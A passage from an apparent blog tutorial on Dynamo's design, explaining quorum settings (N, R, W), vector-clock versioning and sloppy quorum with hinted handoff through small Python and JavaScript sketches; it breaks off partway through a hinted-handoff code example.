&lt;p&gt;&lt;strong&gt;The magic formula&lt;/strong&gt;: When &lt;code&gt;R + W &amp;gt; N&lt;/code&gt;, you guarantee quorum overlap—meaning at least one node that received the write will be queried during any read. This overlap enables detection of the latest version, provided the reconciliation logic correctly identifies the highest vector clock. It does not automatically guarantee read-your-writes unless the coordinator properly resolves versions.&lt;/p&gt;

&lt;p&gt;Let me show you why this matters with real scenarios:&lt;/p&gt;

&lt;h4&gt;
  
  
  Scenario 1: Shopping Cart (Prioritize Availability)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;N&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;  &lt;span class="c1"&gt;# Three replicas for durability
&lt;/span&gt;&lt;span class="n"&gt;R&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;  &lt;span class="c1"&gt;# Read from any single healthy node
&lt;/span&gt;&lt;span class="n"&gt;W&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;  &lt;span class="c1"&gt;# Write to any single healthy node
&lt;/span&gt;
&lt;span class="c1"&gt;# Trade-off analysis:
# ✓ Writes succeed even if 2 out of 3 nodes are down
# ✓ Reads succeed even if 2 out of 3 nodes are down
# ✓ Maximum availability - never reject customer actions
# ✗ Might read stale data
# ✗ Higher chance of conflicts (but we can merge shopping carts)
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What happens during failure:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Client: "Add item to cart"
Coordinator tries N=3 nodes:
- Node 1: ✗ Down
- Node 2: ✓ ACK (W=1 satisfied!)
- Node 3: Still waiting...

Result: SUCCESS returned to client immediately
Node 3 eventually gets the update (eventual consistency)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv7175xzvud1fves1mmcr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv7175xzvud1fves1mmcr.png" alt="image" width="800" height="586"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Scenario 2: Session State (Balanced Approach)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;N&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;
&lt;span class="n"&gt;R&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;  &lt;span class="c1"&gt;# Must read from 2 nodes
&lt;/span&gt;&lt;span class="n"&gt;W&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;  &lt;span class="c1"&gt;# Must write to 2 nodes
&lt;/span&gt;
&lt;span class="c1"&gt;# Trade-off analysis:
# ✓ R + W = 4 &amp;gt; N = 3 → quorums overlap → read-your-writes (given correct version resolution)
# ✓ Tolerates 1 node failure
# ✓ Good balance of consistency and availability
# ✗ Write fails if 2 nodes are down
# ✗ Read fails if 2 nodes are down
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why R + W &amp;gt; N enables read-your-writes:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Write to W=2 nodes: [A, B]
Later, read from R=2 nodes: [B, C]

Because W + R = 4 &amp;gt; N = 3, there's guaranteed overlap!
At least one node (B in this case) will have the latest data.

The coordinator detects the newest version by comparing vector clocks.
This guarantees seeing the latest write as long as reconciliation
picks the causally most-recent version correctly.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F71pmdh8offe03nrirwy2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F71pmdh8offe03nrirwy2.png" alt="image" width="800" height="832"&gt;&lt;/a&gt;&lt;/p&gt;
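&lt;p&gt;The overlap guarantee is pure pigeonhole counting, and for small N you can check it exhaustively. This sketch enumerates every possible read quorum and write quorum for N=3 and confirms that R=W=2 always intersect, while R=W=1 can miss each other:&lt;/p&gt;

```python
from itertools import combinations

nodes = {"A", "B", "C"}  # N = 3 replicas

def always_overlaps(R, W):
    """True iff every R-node read set intersects every W-node write set."""
    return all(
        set(r) & set(w)
        for r in combinations(nodes, R)
        for w in combinations(nodes, W)
    )

print(always_overlaps(R=2, W=2))  # R + W = 4 > 3 → True
print(always_overlaps(R=1, W=1))  # R + W = 2 ≤ 3 → False
```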

&lt;h4&gt;
  
  
  Scenario 3: Financial Data (Prioritize Consistency)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;N&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;
&lt;span class="n"&gt;R&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;  &lt;span class="c1"&gt;# Must read from ALL nodes
&lt;/span&gt;&lt;span class="n"&gt;W&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;  &lt;span class="c1"&gt;# Must write to ALL nodes
&lt;/span&gt;
&lt;span class="c1"&gt;# Trade-off analysis:
# ✓ Full replica quorum — reduces likelihood of divergent versions
# ✓ Any read will overlap every write quorum
# ✗ Write fails if ANY node is down
# ✗ Read fails if ANY node is down
# ✗ Poor availability during failures
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Systems requiring strict transactional guarantees typically choose CP systems instead. This configuration is technically supported by Dynamo but sacrifices the availability properties that motivate using it in the first place.&lt;/p&gt;

&lt;h4&gt;
  
  
  Configuration Comparison Table
&lt;/h4&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Config&lt;/th&gt;
&lt;th&gt;N&lt;/th&gt;
&lt;th&gt;R&lt;/th&gt;
&lt;th&gt;W&lt;/th&gt;
&lt;th&gt;Availability&lt;/th&gt;
&lt;th&gt;Consistency&lt;/th&gt;
&lt;th&gt;Use Case&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;High Availability&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;⭐⭐&lt;/td&gt;
&lt;td&gt;Shopping cart, wish list&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Balanced&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Session state, user preferences&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Full Quorum&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;⭐⭐&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;High-stakes reads (not linearizable)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Read-Heavy&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;⭐⭐⭐ (reads)&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Product catalog, CDN metadata&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Write-Heavy&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;⭐⭐⭐ (writes)&lt;/td&gt;
&lt;td&gt;⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Click tracking, metrics&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note on financial systems&lt;/strong&gt;: Systems requiring strong transactional guarantees (e.g., bank account balances) typically shouldn't use Dynamo. That said, some financial systems do build on Dynamo-style storage for their persistence layer while enforcing stronger semantics at the application or business logic layer.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  The Key Insight
&lt;/h4&gt;

&lt;p&gt;Most systems use &lt;strong&gt;N=3, R=2, W=2&lt;/strong&gt; because:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Durability&lt;/strong&gt;: Can tolerate up to 2 replica failures before permanent data loss (assuming independent failures and no correlated outages).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Availability&lt;/strong&gt;: Tolerates 1 node failure for both reads and writes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Consistency&lt;/strong&gt;: R + W &amp;gt; N guarantees that read and write quorums overlap, enabling read-your-writes behavior in the absence of concurrent writes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Performance&lt;/strong&gt;: Don't wait for the slowest node (only need 2 out of 3)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Real production numbers from the paper:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Amazon's shopping cart service during peak (holiday season):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Configuration: N=3, R=2, W=2&lt;/li&gt;
&lt;li&gt;Handled tens of millions of requests&lt;/li&gt;
&lt;li&gt;Over 3 million checkouts in a single day&lt;/li&gt;
&lt;li&gt;No downtime, even with server failures&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This tunable approach is what made Dynamo revolutionary. You're not stuck with one-size-fits-all—you tune it based on your actual business requirements.&lt;/p&gt;
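&lt;p&gt;Operationally, these knobs live in a coordinator that fans a request out to the N replicas and returns as soon as the quorum is met. The sketch below is hypothetical and sequential for brevity (real coordinators issue requests in parallel); &lt;code&gt;node.read&lt;/code&gt; and the &lt;code&gt;Up&lt;/code&gt;/&lt;code&gt;Down&lt;/code&gt; stand-ins are assumptions for illustration:&lt;/p&gt;

```python
class Up:
    """Stand-in for a healthy replica."""
    def __init__(self, value): self.value = value
    def read(self, key): return self.value

class Down:
    """Stand-in for an unreachable replica."""
    def read(self, key): raise ConnectionError("node down")

def quorum_read(replicas, key, R):
    """Collect replies until the read quorum R is met; raise otherwise."""
    replies = []
    for node in replicas:      # real coordinators fan out in parallel
        try:
            replies.append(node.read(key))
        except Exception:
            continue           # skip failed replicas, keep walking
        if len(replies) >= R:
            # From here the caller reconciles versions (e.g., by vector clock)
            return replies
    raise RuntimeError(f"read quorum not met: {len(replies)}/{R}")

# One node down, R=2: the read still succeeds
print(quorum_read([Down(), Up("cart-v2"), Up("cart-v1")], "cart", R=2))
```

&lt;p&gt;The same shape works for writes: replace &lt;code&gt;read&lt;/code&gt; with &lt;code&gt;write&lt;/code&gt; and &lt;code&gt;R&lt;/code&gt; with &lt;code&gt;W&lt;/code&gt;.&lt;/p&gt;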

&lt;h3&gt;
  
  
  3. Vector Clocks for Versioning
&lt;/h3&gt;

&lt;h4&gt;
  
  
  The Problem: Detecting Causality in Distributed Systems
&lt;/h4&gt;

&lt;p&gt;When multiple nodes can accept writes independently, you need to answer a critical question: &lt;strong&gt;Are these two versions of the same data related, or were they created concurrently?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why timestamps don't work:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Scenario: Two users edit the same shopping cart simultaneously

User 1 at 10:00:01.500 AM: Adds item A → Writes to Node X
User 2 at 10:00:01.501 AM: Adds item B → Writes to Node Y

Physical timestamp says: User 2's version is "newer"
Reality: These are concurrent! Both should be kept!

Problem: 
- Clocks on different servers are NEVER perfectly synchronized
- Clock skew can be seconds or even minutes
- Network delays are unpredictable
- Physical time doesn't capture causality
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What we really need to know:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Version A happened before Version B?     → B can overwrite A
Version A and B are concurrent?          → Keep both, merge later
Version A came from reading Version B?   → We can track this!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  The Solution: Vector Clocks
&lt;/h4&gt;

&lt;p&gt;A vector clock is a simple data structure: a list of &lt;code&gt;(node_id, counter)&lt;/code&gt; pairs that tracks which nodes have seen which versions.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The rules:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;When a node writes data, it increments its own counter&lt;/li&gt;
&lt;li&gt;When a node reads data, it gets the vector clock&lt;/li&gt;
&lt;li&gt;When comparing two vector clocks:

&lt;ul&gt;
&lt;li&gt;If every counter in A ≤ the corresponding counter in B (with at least one strictly less) → A is an ancestor of B (B is newer)&lt;/li&gt;
&lt;li&gt;If some counters in A &amp;gt; B and some B &amp;gt; A → A and B are concurrent (conflict!)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
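&lt;p&gt;These rules translate directly into a small comparison function. The sketch below is illustrative, not Dynamo's actual code; a clock is a plain dict of node → counter, and a missing entry counts as 0:&lt;/p&gt;

```python
def compare(a: dict, b: dict) -> str:
    """Compare two vector clocks: 'ancestor', 'descendant', 'equal', or 'concurrent'."""
    nodes = set(a) | set(b)
    a_le_b = all(a.get(n, 0) <= b.get(n, 0) for n in nodes)
    b_le_a = all(b.get(n, 0) <= a.get(n, 0) for n in nodes)
    if a_le_b and b_le_a:
        return "equal"
    if a_le_b:
        return "ancestor"    # a happened before b; b may overwrite a
    if b_le_a:
        return "descendant"  # b happened before a
    return "concurrent"      # conflict: keep both, merge later

# The D3 vs D4 conflict from the example below:
print(compare({"Sx": 2, "Sy": 1}, {"Sx": 2, "Sz": 1}))  # concurrent
```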

&lt;h4&gt;
  
  
  Step-by-Step Example
&lt;/h4&gt;

&lt;p&gt;Let's trace a shopping cart through multiple updates:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw4f1exuntzcchjyukf1e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw4f1exuntzcchjyukf1e.png" alt="image" width="800" height="1526"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Breaking down the conflict:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;D3: [Sx:2, Sy:1]  vs  D4: [Sx:2, Sz:1]

Comparing:
- Sx: 2 == 2  ✓ (equal)
- Sy: 1 vs missing in D4  → D3 has something D4 doesn't
- Sz: missing in D3 vs 1  → D4 has something D3 doesn't

Conclusion: CONCURRENT! Neither is an ancestor of the other.
Both versions must be kept and merged.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Real-World Characteristics
&lt;/h4&gt;

&lt;p&gt;The Dynamo paper reports the following conflict distribution measured over 24 hours of Amazon's production shopping cart traffic. These numbers reflect Amazon's specific workload — high read/write ratio, mostly single-user sessions — and should not be assumed to generalize to all Dynamo deployments:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;99.94%    - Single version (no conflict)
0.00057%  - 2 versions
0.00047%  - 3 versions  
0.00009%  - 4 versions
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Key insight&lt;/strong&gt;: Conflicts are RARE in practice! &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why conflicts happen:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Not usually from network failures&lt;/li&gt;
&lt;li&gt;Mostly from concurrent writers (often automated processes/bots)&lt;/li&gt;
&lt;li&gt;Human users rarely create conflicts because they're slow compared to network speed&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  The Size Problem
&lt;/h4&gt;

&lt;p&gt;Vector clocks can grow unbounded if many nodes coordinate writes. Dynamo's solution: &lt;strong&gt;truncate the oldest entries&lt;/strong&gt; once the clock exceeds a size threshold.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// When vector clock exceeds threshold (e.g., 10 entries)&lt;/span&gt;
&lt;span class="c1"&gt;// Remove the oldest entry based on wall-clock timestamp&lt;/span&gt;

&lt;span class="nx"&gt;vectorClock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;Sx&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="na"&gt;counter&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;timestamp&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1609459200&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;Sy&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="na"&gt;counter&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;timestamp&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1609459800&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;Sz&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="na"&gt;counter&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;timestamp&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1609460400&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="c1"&gt;// ... 10 more entries&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;// If size &amp;gt; 10, remove entry with oldest timestamp&lt;/span&gt;
&lt;span class="c1"&gt;// ⚠ Risk: Dropping an entry collapses causality information.&lt;/span&gt;
&lt;span class="c1"&gt;//   Two versions that were causally related may now appear&lt;/span&gt;
&lt;span class="c1"&gt;//   concurrent, forcing the application to resolve a conflict&lt;/span&gt;
&lt;span class="c1"&gt;//   that didn't actually exist. In practice, Amazon reports&lt;/span&gt;
&lt;span class="c1"&gt;//   this has not been a significant problem — but it is a&lt;/span&gt;
&lt;span class="c1"&gt;//   real theoretical risk in high-churn write environments&lt;/span&gt;
&lt;span class="c1"&gt;//   with many distinct coordinators.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4. Sloppy Quorum and Hinted Handoff
&lt;/h3&gt;

&lt;h4&gt;
  
  
  The Problem: Strict Quorums Kill Availability
&lt;/h4&gt;

&lt;p&gt;Traditional quorum systems are rigid and unforgiving.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Traditional strict quorum:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Your data is stored on nodes: A, B, C (preference list)
Write requirement: W = 2

Scenario: Node B is down for maintenance

Coordinator: "I need to write to 2 nodes from {A, B, C}"
Tries: A ✓, B ✗ (down), C ✓
Result: SUCCESS (got 2 out of 3)

Scenario: Nodes B AND C are down

Coordinator: "I need to write to 2 nodes from {A, B, C}"
Tries: A ✓, B ✗ (down), C ✗ (down)
Result: FAILURE (only got 1 out of 3)

Customer: "Why can't I add items to my cart?!" 😡
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The problem: &lt;strong&gt;Strict quorums require specific nodes&lt;/strong&gt;. If those specific nodes are down, the system becomes unavailable.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Real scenario at Amazon:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Black Friday, 2:00 PM
- Datacenter 1: 20% of nodes being rebooted (rolling deployment)
- Datacenter 2: Network hiccup (1-2% packet loss)
- Traffic: 10x normal load

With strict quorum:
- 15% of write requests fail
- Customer support phones explode
- Revenue impact: Millions per hour
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  The Solution: Sloppy Quorum
&lt;/h4&gt;

&lt;p&gt;Dynamo relaxes the quorum requirement: &lt;strong&gt;"Write to the first N healthy nodes in the preference list, walking further down the ring if needed."&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Preference list for key K: A, B, C
But B is down...

Sloppy Quorum says:
"Don't give up! Walk further down the ring:
 A, B, C, D, E, F, ..."

Coordinator walks until N=3 healthy nodes are found: A, C, D
(D is a temporary substitute for B)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
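&lt;p&gt;The walk itself is only a few lines. A hypothetical helper: given the clockwise node order starting at the key's home position and the set of currently healthy nodes, take the first N healthy ones and mark any node outside the original preference list as a hinted substitute:&lt;/p&gt;

```python
def first_n_healthy(ring_order, healthy, n, preferred):
    """Return [(node, is_hint)]: walk clockwise, skip dead nodes,
    and flag substitutes outside the preferred set as hinted."""
    picked = []
    for node in ring_order:
        if node in healthy:
            picked.append((node, node not in preferred))
        if len(picked) == n:
            break
    return picked

# B is down: D substitutes for it and carries a hint
print(first_n_healthy(["A", "B", "C", "D", "E"],
                      healthy={"A", "C", "D", "E"},
                      n=3, preferred={"A", "B", "C"}))
# [('A', False), ('C', False), ('D', True)]
```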



&lt;h4&gt;
  
  
  How Hinted Handoff Works
&lt;/h4&gt;

&lt;p&gt;When a node temporarily substitutes for a failed node, it stores a "hint" with the data.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9yyza68cb39b33pj2sf4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9yyza68cb39b33pj2sf4.png" alt="image" width="800" height="791"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Detailed Hinted Handoff Process
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Detect failure and substitute&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;write_with_hinted_handoff&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;W&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;preference_list&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;get_preference_list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# [A, B, C]
&lt;/span&gt;
    &lt;span class="n"&gt;healthy_nodes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;preference_list&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;is_healthy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="n"&gt;healthy_nodes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;is_hint&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;False&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

    &lt;span class="c1"&gt;# If we don't have N healthy nodes, expand the list
&lt;/span&gt;    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;healthy_nodes&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;extended_list&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;get_extended_preference_list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;extended_list&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
